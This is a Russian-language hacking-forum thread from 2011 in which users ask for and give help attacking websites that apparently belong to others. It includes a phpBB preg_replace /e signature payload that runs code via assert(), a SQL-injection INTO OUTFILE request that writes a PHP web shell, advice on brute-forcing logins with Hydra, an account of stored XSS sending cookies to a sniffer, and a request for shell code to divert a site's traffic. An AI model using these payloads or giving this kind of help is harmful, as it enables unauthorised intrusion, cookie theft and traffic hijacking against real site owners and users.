ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.11.2011, 05:10
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
Сообщение от теща
теща said:
скачал AET2
сайт начинается с https://тутпоставилИПсайта вставил в форму программы сделал пасы и логин , но чет не работает так как надо , капчи нету , что не так ?
поставил на перебор на TYPE HTTP (Form)
что не так сделал ?
там нету протокола https
THC-Hydra работает с https. А вообще в гугле много инструментов.
|
|
|

08.11.2011, 20:18
|
|
Новичок
Регистрация: 21.12.2009
Сообщений: 0
Провел на форуме: 15756
Репутация:
0
|
|
Сообщение от Strilo4ka
Strilo4ka said:
Copy() будет ограничена при safe_mode=on.
Лучше move_uploaded_file().
Да ладно?
Какие именно ограничения будут у copy() и не будут у move_uploaded_file() при сейфмоде не просветите?
|
|
|

08.11.2011, 20:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 36102
Репутация:
0
|
|
Тёща, отпиши в личку, напишу скрипт.
|
|
|
|

09.11.2011, 04:52
|
|
Участник форума
Регистрация: 10.08.2009
Сообщений: 238
Провел на форуме: 724939
Репутация:
108
|
|
Все привет, у меня чисто теоретический вопрос - нашел сегодня маленький сайтик - голый html, ни одного php-скрипта, 100%. Все что есть - это корневой каталог со страничками и папка /cgi-bin, в ней лежит чей-то шелл.
Вопрос - каким образом возможно залить его? В .htaccess никакой магии с интерпретацией html как php нет. Права на папку - drwxr-xr-x. Safe mode: OFF если что, система - линукс.
|
|
|

09.11.2011, 08:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 28093
Репутация:
11
|
|
=Zeus=,
через соседей, через саппорт хостинга
|
|
|
|

09.11.2011, 13:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 43818
Репутация:
0
|
|
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;
сделал восстановление в бд, открыл профиль, на других такого никогда не было
что за ошибка такая ?
Сообщение от None
Parse error: syntax error, unexpected ']' in /xxx/xxx/includes/usercp_register.php(686) : regexp code on line 1
Fatal error: preg_replace() [function.preg-replace]: Failed evaluating code: ] in
|
|
|
|

09.11.2011, 14:40
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме: 102906
Репутация:
-14
|
|
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
Запрос
Код:
Code:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--
Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)
|
|
|

09.11.2011, 14:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от aydin-ka
aydin-ka said:
Хочу залить шелл через SQL-injection. Нашел на сервере phpinfo. Знаю полный путь.
Запрос
Код:
Code:
http://www.site.com/index.php?=1&id=9999999+union+select+1,2,3,4,5,6,7,8,%3C?php%20system%28$_GET[%91cmd%92]%29%20?%3E,10+INTO+OUTFILE%20%27/home/site/public_html/1.php%27%20--
Запрос идет...открываю http://www.site.com/1.php?cmd=phpinfo {ничего не выводиться}
В чем ошибка? или я что-то упустил (в настройках сервера какую ту функцию)
phpinfo() это функция, а не константа, после имени идут скобки и " ; "
+ у тебя system, код не eval -ится, не сможешь вывести phpinfo, только системные команды
|
|
|

11.11.2011, 05:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 4716
Репутация:
0
|
|
кто подскажет в чем проблемма,нашел xss активную попробывал впихуть скрипт в страницу,куки сразу пришли на снифер ,а вот код в странице не сохранился
xss в POST запросе
|
|
|
|

11.11.2011, 15:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 269
Репутация:
0
|
|
Собственно у меня вопрос. Если я имею доступ к одному сайту (или к шаблонам) что мне вставить в php код (какой код шелла) что бы трафик просто сливался на один сайт и все.
Заранее спасибо!
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|